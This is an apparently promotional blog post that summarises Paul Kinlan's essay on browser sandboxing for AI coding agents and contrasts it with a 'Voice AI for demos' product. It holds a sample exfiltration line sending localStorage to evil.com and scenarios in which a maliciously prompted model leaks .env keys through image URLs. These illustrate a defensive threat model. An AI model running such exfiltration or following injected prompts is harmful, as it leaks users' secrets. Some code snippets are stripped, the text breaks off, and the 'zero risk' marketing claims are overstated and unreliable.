Paul Kinlan: "The Browser is the Sandbox" (90 HN Points, 45 Comments)—AI Coding Agents Need Filesystem/Network/Execution Isolation—Voice AI for Demos Takes Opposite Approach: Read-Only DOM Access, No File Changes, Zero Network Risk
# Paul Kinlan: "The Browser is the Sandbox" (90 HN Points, 45 Comments)—AI Coding Agents Need Filesystem/Network/Execution Isolation—Voice AI for Demos Takes Opposite Approach: Read-Only DOM Access, No File Changes, Zero Network Risk
## Meta Description
Paul Kinlan's "The Browser is the Sandbox" essay (90 HN points) shows how AI coding agents need three-layer isolation (filesystem, network, execution) to run untrusted code safely. Voice AI for demos takes the opposite approach: read-only DOM access eliminates filesystem risk, client-side execution blocks network exfiltration, behavioral guidance needs zero code execution—proving sandboxing is overkill when you don't write files or run code.
## Introduction: The Sandbox Problem for AI Agents
A Google Chrome Developer Advocate just published 90-point Hacker News essay arguing **AI coding agents need robust sandboxing** to prevent catastrophic damage. Paul Kinlan's "The Browser is the Sandbox" describes how tools like Claude Cowork (which edits files on your machine) require three layers of isolation: filesystem lockdown (prevent accessing parent directories), network control (block data exfiltration), execution sandboxing (run untrusted code safely).
The threat model is real: **an AI agent with file access + network access + code execution = potential disaster**. It could extract SSH keys, exfiltrate sensitive data via image URLs, create malicious .docx files with macros, or delete critical files without undo. Paul builds "Co-do" (browser-based AI file manager) to demonstrate sandboxing using File System Access API (chroot-like directory jail), CSP headers (network lockdown), and Web Workers + WebAssembly (execution isolation).
But here's the insight Voice AI for demos reveals: **most AI assistance doesn't need file access, network control, or code execution**. Demos don't edit your filesystem—they read DOM structure. Demos don't exfiltrate data—they run client-side. Demos don't execute untrusted code—they deliver voice guidance based on behavioral patterns. **When you eliminate write operations, network dependencies, and code execution, you eliminate the need for complex sandboxing entirely.**
This article analyzes Paul Kinlan's sandboxing framework (trending on HN with 45 comments), extracts the three-layer isolation model, and demonstrates how Voice AI sidesteps all three risks by choosing read-only DOM access over file manipulation. We'll cover why coding agents need sandboxing (file edits = permanent damage), how browsers provide three isolation layers (filesystem APIs, CSP iframes, Web Workers), and why demo guidance needs zero sandboxing (DOM reading is inherently safe, client-side execution blocks exfiltration, behavioral nudges require no code changes). If you're building AI tools and wondering whether you need sandboxing, Paul's essay reveals when isolation is critical—and Voice AI shows when it's unnecessary.
---
## The Three-Layer Sandboxing Model: Filesystem, Network, Execution
### Why AI Coding Agents Need Isolation
Paul Kinlan starts with the threat model:
> "One of the worries that people rightly have is giving unfettered access to a tool that you don't know how it works and can perform destructive actions on your data."
**Anthropic's Claude Cowork** is a coding agent that edits files on your machine. It can create, modify, and delete files across your entire project directory. The risk: if the AI makes a mistake (or is maliciously prompted), it could:
- Delete critical configuration files (no undo!)
- Extract SSH keys from `~/.ssh` and exfiltrate them
- Create malicious .docx files with macros that execute when opened
- Modify package.json to include malware dependencies
- Overwrite production code with broken implementations
**This isn't theoretical**—Paul notes he runs Claude Code "a bit risky" without constraining filesystem access, relying on monitoring interactions to maintain control. But for regular users, this model is untenable: **you can't expect users to audit every file operation before approving it**.
Anthropic solves this with their [sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime): a VM that locks down the agent to only the user-selected directory with limited network access. Paul asks: **Can the browser provide equivalent sandboxing without running a multi-GB local container?**
### The Browser's Three Sandboxing Layers
Paul identifies three areas needing isolation:
**Layer 1: The Filesystem**
> "You don't want an autonomous system to be able to change files without permission, or reach out past where the user has given access. You also probably want some sort of backup."
**Browser solution**: File System Access API
- **Read-only access**: `` lets user select folder, browser provides read-only handle
- **Origin-private filesystem**: Browser gives app-specific filesystem (not user's actual files)
- **Full access to selected folder**: File System Access API provides read+write handle to user-selected directory with **chroot-like** restriction—can't access parent directories or siblings
**Why this matters**: File System Access API creates a "filesystem jail" where the AI agent can only operate within the boundary the user approved. It can't reach up to `~/.ssh`, can't access sibling projects, can't escape the granted directory.
**Layer 2: The Network**
> "How do we ensure that the data remains within our control? We have to be able to completely control the network."
**Browser solution**: Content Security Policy (CSP)
- **Blunt lockdown**: Start with `default-src 'none'` (block everything), selectively allow specific origins
- **LLM provider whitelist**: Only allow connections to `api.anthropic.com`, `api.openai.com`, `generativelanguage.googleapis.com`
- **Block exfiltration vectors**: Prevent `
` from sending data via image requests
**Why this matters**: Without network control, malicious prompts could craft URLs embedding sensitive file contents in image sources, fetch requests, or beacon API calls. CSP blocks all network requests except to approved LLM providers.
**Layer 3: The Execution Environment**
> "You are running code that someone somewhere has created (similar to sandbox-exec on macOS)."
**Browser solution**: Web Workers + WebAssembly
- **Web Workers**: Isolate code execution off-the-main-thread, separate from DOM manipulation
- **WebAssembly**: Run compiled binaries (e.g., SQLite, ffmpeg) with robust security model designed for untrusted code
- **Inherited CSP**: Workers inherit parent's CSP constraints, blocking unauthorized network access even from WASM modules
**Why this matters**: AI coding agents often run user-provided code or LLM-generated scripts. Without execution isolation, malicious code could access DOM APIs, exfiltrate data, or modify page state.
### The Double-Iframe Technique for LLM Output
Paul describes a clever trick for sandboxing LLM-generated content:
**Outer iframe**: Sets CSP policy (`default-src 'none'`) acting as "network firewall"
**Inner iframe**: Holds untrusted LLM output, isolated onto separate origin
```html
">
```
**The result**: Even if the LLM generates ``, the outer iframe's CSP blocks the fetch request immediately. The inner iframe can't escape its sandbox.
**The trade-off**: This double-iframe is "incredibly wasteful"—two full DOMs for every piece of untrusted content. But it's necessary when you're running LLM-generated code that might be hostile.
---
## Co-do Demo: Putting Browser Sandboxing Into Practice
### What Co-do Does
Paul builds [co-do.xyz](http://co-do.xyz) to demonstrate browser-based AI agent sandboxing:
**Functionality**:
- User selects folder on machine (File System Access API)
- Configures AI provider (Anthropic/OpenAI/Google) with API key
- AI performs file operations: list files, create documents, search content, compare files
- Runs pre-compiled WASM tools (e.g., sha256 hash) in Web Workers
**Sandboxing implementation**:
1. **Filesystem isolation**: File System Access API grants access only to selected folder—can't reach parent directories or `~/.ssh`
2. **Network lockdown**: CSP allows `connect-src 'self' https://api.anthropic.com https://api.openai.com https://generativelanguage.googleapis.com`—only AI providers receive data
3. **LLM output sandboxing**: AI responses render in iframes with `allow-same-origin` but NOT `allow-scripts`—LLM can't inject executable JavaScript
4. **Execution isolation**: WASM tools run in fresh Web Workers with inherited CSP—even WASM modules can't make unauthorized network requests
**Example workflow**:
1. User: "Create a summary file of all markdown documents and hash it with sha256"
2. AI plans: Read all .md files, generate summary, write new file, run sha256 tool
3. Browser prompts: "Allow write access to create summary.md?" → User approves
4. WASM worker: Runs sha256 in isolated Worker, returns hash
5. AI delivers: Summary file created, hash displayed, no data exfiltrated
### Known Gaps in Browser Sandboxing
Paul honestly lists limitations:
**Gap 1: You still trust the LLM provider**
> "Your file contents get sent to Anthropic, OpenAI, or Google for processing. CSP ensures data only goes there, but 'there' is still a third party."
**Gap 2: Malicious file creation is possible**
> "The LLM could create a .docx with macros, a .bat file, or a malicious script that's harmless in the browser but dangerous when opened by another application."
**Gap 3: allow-same-origin trade-offs**
> "The markdown iframe needs this to calculate content height for proper display. This means I can't run scripts and have same-origin access without the iframe being able to escape its sandbox."
**Gap 4: CSP might not block everything**
> "What about the Beacon API queuing requests? DNS prefetch for resources? A chrome://net-export/ dump looked clean, but I don't have complete certainty."
**Gap 5: No undo**
> "If you grant write permission and the LLM deletes a file, it's gone. Co-do has granular permissions (always allow, ask each time, never allow) but no backup system."
**Gap 6: Permission fatigue**
> "Asking users to approve every operation is secure but annoying. Letting users blanket-allow operations is convenient but risky."
**Gap 7: Cross-browser limitations**
> "The csp attribute on iframes only works in Blink-based browsers. Safari's File System Access API lacks showDirectoryPicker, making local folder editing impossible."
**The conclusion**: Browser sandboxing is robust but imperfect. It's suitable for AI coding agents because the value (automated file edits) outweighs the risks (trusted provider, permission fatigue, no undo). But for tasks that don't need file writes, **all this complexity is overkill**.
---
## Voice AI's Opposite Approach: No Filesystem, No Network, No Execution
### Why Demos Don't Need File Access
Voice AI for demos sidesteps Paul's entire sandboxing framework by **eliminating write operations entirely**:
**Coding Agent (Co-do)**:
- Needs: Read files, create files, modify files, delete files
- Risk: Delete SSH keys, overwrite production code, create malicious .docx
- Solution: File System Access API + chroot-like jail + permission prompts
**Demo Guidance (Voice AI)**:
- Needs: Read DOM structure (visible elements, form fields, buttons)
- Risk: None—DOM reading is read-only by definition
- Solution: No filesystem API needed, no permission prompts required
**The difference**: Co-do manipulates your filesystem (files are changed, potentially destroyed). Voice AI reads the browser's DOM (nothing is modified, no data is written). **Read-only access requires zero sandboxing because there's nothing to protect against.**
### Example: Voice AI Reading DOM vs Co-do Editing Files
**Co-do workflow (requires sandboxing)**:
1. User: "Create a summary of all markdown files"
2. AI: Reads file1.md, file2.md, file3.md from filesystem
3. AI: Generates summary content
4. AI: Writes summary.md to filesystem (**permanent change, needs permission**)
5. Risk: If AI makes mistake, it could overwrite critical file or create malicious document
**Voice AI workflow (no sandboxing needed)**:
1. User lands on pricing page
2. Voice AI: Reads DOM (detects pricing tiers, user hovering over "Enterprise" option)
3. Voice AI: Delivers prompt: "You're comparing Enterprise vs Pro—Enterprise adds SSO, but Pro has everything you need for teams under 50. Most companies your size pick Pro."
4. Risk: None—no files written, no data modified, DOM reading is read-only
**The pattern**: Co-do's value comes from **writing files** (automation), which creates risk (destructive edits). Voice AI's value comes from **reading DOM** (guidance), which creates zero risk (read-only operation). When you don't write, you don't need filesystem sandboxing.
### Why Demos Don't Need Network Control
Paul's network sandboxing (CSP headers, origin whitelisting) prevents data exfiltration:
**Co-do threat model**:
- LLM generates: `
`
- Without CSP: Image request sends sensitive file contents to attacker's server
- With CSP: `default-src 'none'` blocks image request, data stays local
**Voice AI threat model**:
- Voice AI generates: Voice prompt based on DOM reading: "You're on the pricing page, comparing tiers"
- Network risk: None—voice prompts are client-side strings, no network requests involved
- CSP needed: Zero—no LLM output renders in DOM, no images/scripts generated
**The difference**: Co-do sends file contents to LLM provider for processing, then renders LLM-generated HTML (which might contain exfiltration vectors). Voice AI generates prompts client-side based on DOM patterns, never sending DOM contents anywhere. **Client-side execution eliminates network exfiltration risk entirely.**
### Example: Co-do Network Risk vs Voice AI Client-Side Safety
**Co-do network attack vector**:
1. User shares folder containing `.env` file with API keys
2. AI reads `.env`, sends contents to LLM provider for processing
3. Malicious prompt: "Create HTML summary of files"
4. LLM generates: `
` embedded in HTML
5. Without CSP: Browser loads image, exfiltrates API key to attacker
6. With CSP: CSP blocks image request, preventing exfiltration
**Voice AI attack prevention**:
1. User navigates pricing page
2. Voice AI reads DOM: pricing tiers, current hover state, scroll position
3. Voice AI generates prompt client-side: "Comparing tiers? Pro fits teams under 50."
4. No network request: Prompt delivered locally, never sent to server
5. No exfiltration vector: DOM reading stays in browser, no external communication
**The pattern**: Co-do must send data to LLM provider (file contents leave user's machine), creating exfiltration risk that CSP mitigates. Voice AI processes DOM locally (data never leaves browser), eliminating exfiltration risk entirely. **When execution is client-side, network sandboxing is unnecessary.**
### Why Demos Don't Need Execution Isolation
Paul uses Web Workers + WebAssembly to sandbox code execution:
**Co-do execution risk**:
- AI needs to run user-provided code or LLM-generated scripts
- Risk: Malicious code accesses DOM APIs, modifies page state, exfiltrates data
- Solution: Isolate execution in Web Workers (off-the-main-thread), inherit CSP constraints
**Voice AI execution model**:
- Voice AI delivers behavioral guidance: "Click here," "You're on pricing page"
- Risk: None—no code execution involved, just text prompts based on DOM patterns
- Solution: No workers needed, no WASM required, execution sandboxing irrelevant
**The difference**: Co-do runs untrusted code (LLM-generated scripts, user-provided tools), which could be malicious. Voice AI delivers text prompts (behavioral nudges), which can't execute arbitrary code. **When you don't run code, you don't need execution isolation.**
### Example: Co-do Execution Risk vs Voice AI Guidance Safety
**Co-do execution attack scenario**:
1. User: "Run a script to analyze my code quality"
2. AI generates script: `analyzeCode.js`
3. Script contains: `fetch("https://evil.com/steal", { method: "POST", body: localStorage })`
4. Without Web Worker isolation: Script runs in main thread, accesses localStorage, exfiltrates data
5. With Web Worker + CSP: Worker inherits CSP, fetch blocked, exfiltration prevented
**Voice AI guidance flow**:
1. User stuck on onboarding form
2. Voice AI reads DOM: Form has 8 fields, user hasn't typed anything for 30 seconds
3. Voice AI delivers prompt: "This form looks long—most users skip to the pre-filled demo instead. Want to try that?"
4. No code execution: Just a text prompt, user decides whether to follow suggestion
5. No attack surface: No script runs, no localStorage accessed, no exfiltration possible
**The pattern**: Co-do executes code generated by LLM or provided by user, creating risk that Web Workers mitigate. Voice AI delivers text-based guidance based on DOM state, requiring zero code execution. **When your value proposition is guidance not automation, execution sandboxing is overkill.**
---
## The Filesystem/Network/Execution Trade-Off: When Sandboxing Is Necessary vs Unnecessary
### When You NEED Sandboxing (Coding Agents)
Paul's sandboxing framework is **essential** when AI tools have these characteristics:
**Characteristic 1: File Write Operations**
- **Need**: AI edits, creates, or deletes files on user's machine
- **Risk**: Destructive edits, malicious file creation, data loss
- **Solution**: File System Access API + chroot-like jail + permission prompts
**Characteristic 2: Network-Dependent Functionality**
- **Need**: Send user data to LLM provider for processing
- **Risk**: Data exfiltration via crafted URLs, image sources, fetch requests
- **Solution**: CSP headers + origin whitelisting + double-iframe technique
**Characteristic 3: Code Execution Requirements**
- **Need**: Run user-provided scripts, LLM-generated code, WASM tools
- **Risk**: Malicious code accesses APIs, modifies state, exfiltrates data
- **Solution**: Web Workers + inherited CSP + execution isolation
**Examples needing sandboxing**:
- **Claude Cowork**: Edits project files, runs build tools, modifies configuration → needs all three layers
- **Co-do**: Creates/modifies files in selected directory, calls LLM APIs, runs WASM tools → needs all three layers
- **GitHub Copilot Workspace**: Generates code changes, runs tests, commits to repository → needs all three layers
**The pattern**: If your AI tool **writes data, sends data, or executes code**, you need sandboxing to prevent catastrophic damage.
### When You DON'T NEED Sandboxing (Demo Guidance)
Voice AI sidesteps all three sandboxing requirements:
**Characteristic 1: Read-Only DOM Access**
- **Need**: Read visible elements, form state, scroll position
- **Risk**: None—DOM reading doesn't modify anything
- **Solution**: No filesystem API needed, read-only by default
**Characteristic 2: Client-Side Execution**
- **Need**: Generate prompts based on DOM patterns (local processing)
- **Risk**: None—no data sent to servers, everything stays in browser
- **Solution**: No CSP needed, no network requests involved
**Characteristic 3: Zero Code Execution**
- **Need**: Deliver text-based behavioral nudges ("Click here," "Compare tiers")
- **Risk**: None—prompts are strings, not executable code
- **Solution**: No workers needed, no WASM required, execution isolation irrelevant
**Examples not needing sandboxing**:
- **Voice AI for demos**: Reads DOM, delivers prompts, guides navigation → no writes, no network, no execution
- **Accessibility tools**: Read page structure, announce content, highlight elements → read-only, client-side, no code
- **Analytics trackers**: Monitor clicks, scrolls, hovers → read DOM events, no file access, no execution
**The pattern**: If your AI tool **only reads data, processes locally, and delivers guidance**, sandboxing is unnecessary overhead.
### The Performance/Complexity Cost of Sandboxing
Paul's Co-do demonstrates the **overhead** of browser sandboxing:
**Filesystem sandboxing cost**:
- **Permission prompts**: User must approve every file write operation
- **Permission fatigue**: "Always allow" reduces security, "ask each time" reduces usability
- **No undo**: Deleted files are gone, no backup system in browser sandbox
**Network sandboxing cost**:
- **CSP configuration**: Manually setting `default-src 'none'`, selectively allowing origins
- **Double-iframe overhead**: Two full DOMs loaded for every piece of untrusted content
- **Cross-browser limitations**: `csp` attribute only works in Blink, Safari lacks `showDirectoryPicker`
**Execution sandboxing cost**:
- **Web Worker overhead**: Creating fresh workers for every tool execution
- **WASM compilation**: Compiling binaries for safe execution adds latency
- **CSP inheritance complexity**: Ensuring workers inherit parent CSP without gaps
Voice AI avoids all these costs:
- **No permission prompts**: Read-only DOM access doesn't require user approval
- **No CSP configuration**: Client-side execution doesn't send data anywhere
- **No workers/WASM**: Text-based prompts don't execute code
**The result**: Co-do's sandboxing overhead is justified because file writes are valuable but risky. Voice AI's lack of sandboxing is an advantage because DOM reading is safe and cheap.
---
## The Browser's 30-Year Security Model: Built for Untrusted Code, Overbuilt for Trusted Guidance
### Why Browsers Are Sandboxing Experts
Paul's key insight:
> "Over the last 30 years, we have built a sandbox specifically designed to run incredibly hostile, untrusted code from anywhere on the web, the instant a user taps a URL."
**The browser's threat model**: Every website is potentially malicious. Clicking a link (`https://paul.kinlan.me/`) could load code that:
- Tries to access your filesystem → Blocked by origin isolation
- Attempts to steal cookies → Prevented by SameSite policies
- Exfiltrates data via images → Stopped by CSP
- Executes malicious scripts → Sandboxed by same-origin policy
**The result**: Browsers are **experts at running untrusted code safely**. Paul argues this makes them ideal for AI coding agents: "The browser's 30-year-old security model, built for running hostile code from strangers the moment you click a link, might be better suited for agentic AI than we give it credit for."
### When the Sandbox Is Overkill
But here's the irony: **most web applications aren't hostile, and most AI tools aren't coding agents**.
**The browser's sandbox is designed for worst-case scenarios**:
- Website could be malware → Isolate origins
- Script could steal data → Block cross-origin requests
- Code could access filesystem → Deny file access by default
**But most web tools are cooperative, not hostile**:
- Analytics tools read DOM to track behavior → No filesystem risk
- Accessibility tools announce page structure → No network exfiltration
- Voice AI guides navigation → No code execution
**The mismatch**: Browser sandboxing is built for **untrusted code from strangers**. Demo guidance is **trusted assistance from chosen tools**. Applying Paul's three-layer sandboxing to Voice AI would be like requiring a TSA checkpoint to enter your own home—technically secure, but solving a problem that doesn't exist.
### Example: Browser Sandboxing Overkill for Voice AI
**If Voice AI used Paul's sandboxing framework unnecessarily**:
**Layer 1: Filesystem sandboxing**
- **Requirement**: User selects directory via File System Access API
- **Permission prompt**: "Allow Voice AI to read your pricing page folder?"
- **Overhead**: Chroot-like jail prevents accessing parent directories
- **Reality**: Voice AI doesn't access filesystem—it reads DOM, which is already in browser memory
**Layer 2: Network sandboxing**
- **Requirement**: CSP headers block all requests except whitelisted origins
- **Configuration**: `default-src 'none'; connect-src 'self'`
- **Overhead**: Double-iframe technique to prevent LLM output exfiltration
- **Reality**: Voice AI generates prompts client-side—no LLM requests, no network involved
**Layer 3: Execution sandboxing**
- **Requirement**: Run prompts in Web Workers with inherited CSP
- **WASM compilation**: Compile voice synthesis engine for safe execution
- **Overhead**: Fresh worker for every prompt delivery
- **Reality**: Voice AI delivers text strings—no code execution, just DOM reading + string output
**The result**: All three sandboxing layers solve problems Voice AI doesn't have. File writes that Voice AI doesn't do. Network exfiltration of data Voice AI doesn't send. Code execution Voice AI doesn't perform.
**Paul's conclusion about sandboxing**: "Is it perfect? No. But I think it demonstrates that the browser's 30-year-old security model might be better suited for agentic AI than we give it credit for."
**Voice AI's counter-conclusion**: "Sandboxing is perfect for coding agents that write files. But for demo guidance that reads DOM, the browser's default security model (read-only DOM access, client-side execution) is already sufficient."
---
## The "No Undo" Problem: Why File Writes Need Sandboxing But DOM Reads Don't
### Co-do's Biggest Gap: Permanent Deletion
Paul honestly identifies Co-do's scariest limitation:
> "No undo. If you grant write permission and the LLM deletes a file, it's gone. Co-do has granular permissions (always allow, ask each time, never allow) but no backup system."
**The problem**: Browser sandboxing prevents *unauthorized* file writes (AI can't access files outside granted directory), but it doesn't prevent *authorized* file destruction. If you grant write permission and the AI makes a mistake, **the file is permanently deleted**.
**Why this matters for coding agents**:
1. User: "Clean up temporary files in this directory"
2. AI interprets: Delete all files matching `*.tmp`
3. AI bug: Deletes all files matching `*` instead (removes wildcard filter)
4. Result: Entire directory wiped, no recovery possible
**Mitigation options**:
- **Permission prompts**: Ask before every delete → Mitigates risk but creates permission fatigue
- **Backup system**: Copy files before deletion → Adds complexity, doubles storage
- **Undo stack**: Track all changes, allow reversal → Requires persistent state, complex rollback logic
**Paul's assessment**: All three options have trade-offs. Permission prompts are secure but annoying. Backups prevent data loss but add overhead. Undo stacks are powerful but complex to implement.
### Voice AI's Solution: Never Write Anything
Voice AI sidesteps the "no undo" problem by **never modifying data in the first place**:
**Voice AI operations (all read-only)**:
1. Read DOM: Detect pricing tiers, form fields, scroll position
2. Generate prompt: "You're comparing Enterprise vs Pro"
3. Deliver guidance: Voice output or text overlay
4. User acts: Clicks button, fills form, scrolls page
5. Repeat: Read new DOM state, generate new prompt
**No writes means**:
- **No deletion risk**: Can't delete files you never access
- **No corruption risk**: Can't overwrite data you never modify
- **No undo needed**: Everything is read-only, nothing changes
**Example: Voice AI vs Co-do on "Clean Up" Task**
**Co-do (needs undo)**:
1. User: "Clean up my project directory"
2. AI: Deletes `node_modules`, `.cache`, `*.log` files
3. Bug: Accidentally deletes `package.json` too
4. Result: Project broken, no undo, user must restore from git or backups
**Voice AI (no undo needed)**:
1. User: Viewing project dashboard with file list
2. Voice AI reads DOM: Detects large `node_modules` folder (500MB)
3. Voice AI suggests: "Your node_modules folder is 500MB—want to run `npm prune` to remove unused packages?"
4. User decides: Clicks "Yes" to run command or "No" to ignore
5. Result: User maintains control, Voice AI just provides guidance, nothing automated without approval
**The pattern**: Co-do automates file operations (deletion, modification), which creates risk requiring undo. Voice AI guides user actions (suggestions, prompts), which creates zero risk because user controls execution. **When you don't write, undo becomes irrelevant.**
---
## The Permission Fatigue Problem: Sandboxing Security vs Usability
### Co-do's Trade-Off: Approve Every Operation or Allow Everything
Paul describes the permission tension:
> "Asking users to approve every operation is secure but annoying. Letting users blanket-allow operations is convenient but risky. I've tried to find a middle ground, but the fundamental tension remains."
**Co-do's permission model**:
- **Ask each time**: User approves every file read/write → Secure but creates permission fatigue
- **Always allow**: User grants blanket permission → Convenient but enables destructive automation
- **Never allow**: User blocks operation → Protects data but prevents AI from helping
**Real-world scenario**:
1. User: "Analyze all markdown files and create a summary"
2. AI needs permissions:
- Read file1.md → Prompt: "Allow read access to file1.md?"
- Read file2.md → Prompt: "Allow read access to file2.md?"
- Read file3.md → Prompt: "Allow read access to file3.md?"
- Write summary.md → Prompt: "Allow write access to create summary.md?"
3. User clicks "Allow" 4 times → Task completes, but permission prompts are exhausting
4. Alternative: User clicks "Always allow" → No more prompts, but AI can now delete files without asking
**The dilemma**: Security requires explicit permission for every destructive operation. Usability requires minimizing permission prompts. Co-do can't optimize both simultaneously.
### Voice AI's Solution: Read-Only Operations Need No Permissions
Voice AI eliminates permission prompts by **only reading data that's already visible**:
**Voice AI operations (no permissions needed)**:
1. Read DOM: User's browser already loaded this data (pricing tiers, form fields)
2. Analyze behavior: User's scrolling/hovering is observable without permission
3. Generate prompt: Client-side processing doesn't access sensitive data
4. Deliver guidance: Voice output doesn't modify anything
**No permissions means**:
- **No prompts**: User never interrupted with "Allow Voice AI to read this page?"
- **No fatigue**: Zero permission decisions required
- **No risk**: Read-only access can't cause damage
**Example: Voice AI vs Co-do on "Analyze Files" Task**
**Co-do (permission prompts)**:
1. User: "Analyze all markdown files"
2. Prompt: "Allow read access to file1.md?" → User clicks "Allow"
3. Prompt: "Allow read access to file2.md?" → User clicks "Allow"
4. Prompt: "Allow read access to file3.md?" → User clicks "Allow"
5. Result: 3 permission prompts for a single task
**Voice AI (no prompts)**:
1. User: Viewing documentation page with 3 sections
2. Voice AI reads DOM: Detects section headers, current scroll position
3. Voice AI suggests: "You're reading Installation—most users check API Reference next. Want to jump there?"
4. Result: Zero permission prompts, user just hears suggestion and decides
**The pattern**: Co-do's file access requires user approval for every operation (permission fatigue). Voice AI's DOM reading uses data already loaded in browser (no approval needed). **When you only read what's already visible, permission prompts are unnecessary.**
---
## The "Still Trust the Provider" Gap: Client-Side vs Server-Side Processing
### Co-do's Unavoidable Trust Requirement
Paul acknowledges Co-do's biggest known gap:
> "You're still trusting the LLM provider. Your file contents get sent to Anthropic, OpenAI, or Google for processing. CSP ensures data only goes there, but 'there' is still a third party."
**Why this matters**:
- **Data leaves user's machine**: File contents sent to LLM provider for processing
- **Provider sees everything**: LLM provider has access to all file data, including potentially sensitive information
- **CSP mitigates exfiltration**: CSP ensures data only goes to approved providers (not evil.com), but provider itself is trusted
**Scenarios requiring provider trust**:
1. User shares folder containing `.env` file with API keys
2. AI reads `.env`, sends contents to OpenAI for "summarize my configuration" task
3. OpenAI processes request, returns summary
4. Risk: OpenAI now has your API keys (trusted not to misuse them)
**Paul's mitigation**: "A fully local model would solve this, but we're not quite there yet for capable models in the browser."
**The trade-off**: Co-do's value (automated file operations) requires LLM processing, which requires sending data to provider. Users must trust Anthropic/OpenAI/Google not to misuse file contents.
### Voice AI's Client-Side Advantage: Zero Provider Trust Needed
Voice AI eliminates the trust gap by **processing everything locally**:
**Voice AI workflow (entirely client-side)**:
1. User navigates pricing page
2. Voice AI reads DOM: Pricing tiers, user's current hover state, scroll position
3. Voice AI analyzes patterns: User hovering over "Enterprise" tier for 30 seconds without clicking
4. Voice AI generates prompt: "Comparing Enterprise vs Pro? Pro has everything you need for teams under 50."
5. Voice AI delivers: Text or voice output, entirely in browser
**No server communication means**:
- **No data sent**: DOM contents never leave user's machine
- **No provider trust**: No LLM provider involved, nothing to trust
- **No exfiltration risk**: Client-side execution eliminates network attack surface
**Example: Co-do vs Voice AI on Sensitive Data**
**Co-do (provider sees data)**:
1. User: "Summarize my .env file"
2. Co-do reads: `API_KEY=secret123, DATABASE_URL=postgres://...`
3. Co-do sends to OpenAI: Full .env contents for summarization
4. OpenAI processes: Returns "You have 5 environment variables including API key and database URL"
5. Trust required: User must trust OpenAI not to log/misuse API_KEY value
**Voice AI (provider sees nothing)**:
1. User: Viewing settings page with API key input field
2. Voice AI reads DOM: Detects input field labeled "API Key", current value is masked (`********`)
3. Voice AI analyzes: User hasn't entered anything, cursor hovering over field
4. Voice AI suggests: "Need an API key? Most users generate one from the integrations page first."
5. Trust required: Zero—Voice AI never sees API key value, everything processed client-side
**The pattern**: Co-do sends file contents to LLM provider (requires trust), Voice AI processes DOM locally (requires zero trust). **When execution is client-side, provider trust becomes irrelevant.**
---
## The Cross-Browser Limitation: When Sandboxing Standards Don't Align
### Paul's Browser Compatibility Challenges
Paul identifies a critical gap in browser sandboxing standards:
**Gap 1: CSP attribute browser support**
> "The csp attribute on iframes only works in Blink-based browsers. The double-iframe technique works everywhere but it's wasteful and awkward."
**What this means**:
- **Blink (Chrome/Edge)**: `
← Back to Blog
DEMOGOD